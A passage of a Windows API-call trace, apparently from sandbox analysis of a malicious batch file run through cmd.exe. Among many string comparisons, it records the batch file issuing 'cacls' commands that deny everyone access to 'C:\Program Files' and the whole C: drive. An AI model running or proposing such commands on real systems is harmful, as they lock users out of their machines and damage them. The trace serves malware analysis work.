dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0036.435] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0036.435] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0036.435] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0036.435] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0036.435] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.435] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.435] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.435] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0036.435] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0036.435] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0036.435] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0036.435] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0036.435] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0036.435] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0036.435] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0036.435] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0036.435] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0036.435] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0036.435] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0036.435] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.435] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.435] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.435] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.435] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.436] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.436] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.436] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.436] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.436] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0036.436] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0036.436] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0036.436] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0036.436] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0036.436] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0036.436] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0036.436] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.436] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.436] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0036.436] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0036.436] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0036.436] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0036.436] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\*.*\" /e /d everyone", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\*.*\" /e /d everyone", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="cacls \"C:\\Program Files\\*.*\" /e /d everyone", lpProcessInformation=0xc8ee4c*(hProcess=0x94, hThread=0x8c, dwProcessId=0xbe0, dwThreadId=0xbe4)) returned 1 [0036.438] CloseHandle (hObject=0x8c) returned 1 [0036.438] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0036.438] GetEnvironmentStringsW () returned 0xd1b020* [0036.439] FreeEnvironmentStringsA (penv="=") returned 1 [0036.439] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0036.439] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0036.439] _close (_FileHandle=4) returned 0 [0036.439] WaitForSingleObject (hHandle=0x80, dwMilliseconds=0xffffffff) returned 0x0 [0036.508] GetExitCodeProcess (in: hProcess=0x80, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x0) returned 1 [0036.508] CloseHandle (hObject=0x80) returned 1 [0036.508] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0xffffffff) returned 0x0 [0036.510] GetExitCodeProcess (in: hProcess=0x94, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x5) returned 1 [0036.510] CloseHandle (hObject=0x94) returned 1 [0036.510] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.510] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0036.510] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.510] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0036.510] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.510] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.511] SetConsoleInputExeNameW () returned 0x1 [0036.511] GetConsoleOutputCP () returned 0x1b5 [0036.511] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.511] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.511] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0036.511] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0036.511] _get_osfhandle (_FileHandle=3) returned 0x94 [0036.511] SetFilePointer (in: hFile=0x94, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0036.512] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0036.512] ReadFile (in: hFile=0x94, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x5eb, lpOverlapped=0x0) returned 1 [0036.512] SetFilePointer (in: hFile=0x94, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0036.512] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\nd everyone\r\n\n\r\n=%%i\r\n") returned 38 [0036.512] GetFileType (hFile=0x94) returned 0x1 [0036.512] _get_osfhandle (_FileHandle=3) returned 0x94 [0036.512] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0036.512] _wcsicmp (_String1="echo", _String2=")") returned 60 [0036.512] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0036.512] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0036.512] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0036.512] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0036.512] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0036.512] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0036.512] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0036.512] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0036.512] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0036.512] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0036.512] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0036.513] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0036.513] _tell (_FileHandle=3) returned 1193 [0036.513] _close (_FileHandle=3) returned 0 [0036.513] _pipe (in: _PtHandles=0xd26080, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xd26080) returned 0 [0036.513] _dup (_FileHandle=1) returned 5 [0036.513] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0036.513] _close (_FileHandle=4) returned 0 [0036.513] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0036.513] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0036.513] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0036.513] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0036.513] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0036.513] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0036.513] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0036.513] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0036.513] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0036.513] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0036.513] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0036.513] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0036.513] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0036.513] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0036.513] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0036.513] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0036.513] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0036.513] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0036.513] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0036.513] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0036.514] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.514] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0036.514] SetErrorMode (uMode=0x0) returned 0x0 [0036.514] SetErrorMode (uMode=0x1) returned 0x0 [0036.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x208, lpBuffer=0xd18210, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0xc8ecc4*="system32") returned 0x13 [0036.514] SetErrorMode (uMode=0x0) returned 0x1 [0036.514] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\system32\\.") returned 1 [0036.514] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.514] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.514] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0xc8ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea70) returned 0xd167a0 [0036.514] FindClose (in: hFindFile=0xd167a0 | out: hFindFile=0xd167a0) returned 1 [0036.514] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0036.514] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0036.514] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.514] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0036.514] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0036.514] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0036.514] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0036.514] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0036.514] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0036.514] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0036.514] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.514] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.514] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.514] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0036.514] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0036.515] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0036.515] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0036.515] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessInformation=0xc8ee4c*(hProcess=0x8c, hThread=0x80, dwProcessId=0x974, dwThreadId=0x8dc)) returned 1 [0036.519] CloseHandle (hObject=0x80) returned 1 [0036.519] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0036.519] GetEnvironmentStringsW () returned 0xd1b020* [0036.519] FreeEnvironmentStringsA (penv="=") returned 1 [0036.519] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0036.519] _get_osfhandle (_FileHandle=3) returned 0x94 [0036.519] DuplicateHandle (in: hSourceProcessHandle=0x8c, hSourceHandle=0x94, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0036.519] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0036.519] _close (_FileHandle=5) returned 0 [0036.519] _dup (_FileHandle=0) returned 4 [0036.519] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0036.519] _close (_FileHandle=3) returned 0 [0036.519] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0036.519] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0036.519] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0036.519] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0036.519] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0036.519] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0036.519] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0036.520] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0036.520] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0036.520] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0036.520] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0036.520] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0036.520] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0036.520] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0036.520] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0036.520] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0036.520] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0036.520] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0036.520] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0036.520] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0036.520] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0036.520] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0036.520] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0036.520] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0036.520] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0036.520] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0036.520] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0036.520] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0036.520] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0036.520] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0036.520] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0036.520] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0036.520] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0036.520] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0036.520] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0036.520] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0036.520] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0036.520] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0036.520] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0036.520] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0036.520] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0036.520] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0036.520] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0036.520] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0036.520] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0036.520] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0036.520] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0036.520] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0036.520] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0036.520] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0036.520] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0036.520] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0036.520] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0036.520] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0036.521] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0036.521] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0036.521] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0036.521] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0036.521] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0036.521] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0036.521] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0036.521] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0036.521] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0036.521] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0036.521] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0036.521] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0036.521] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0036.521] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0036.521] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0036.521] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0036.521] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0036.521] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0036.521] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0036.521] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0036.521] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0036.521] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0036.521] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0036.521] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0036.521] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0036.521] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0036.521] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0036.521] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0036.521] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0036.521] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0036.521] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0036.521] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0036.521] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0036.521] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0036.521] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0036.521] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0036.521] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0036.521] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0036.521] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0036.521] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0036.521] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0036.521] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0036.521] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0036.521] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0036.521] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0036.521] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0036.521] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0036.521] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0036.521] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0036.521] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0036.522] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0036.522] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0036.522] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0036.522] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0036.522] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0036.522] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0036.522] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0036.522] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0036.522] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0036.522] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0036.522] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0036.522] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0036.522] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0036.522] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0036.522] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0036.522] _wcsicmp (_String1="cacls", _String2="DPATH") returned 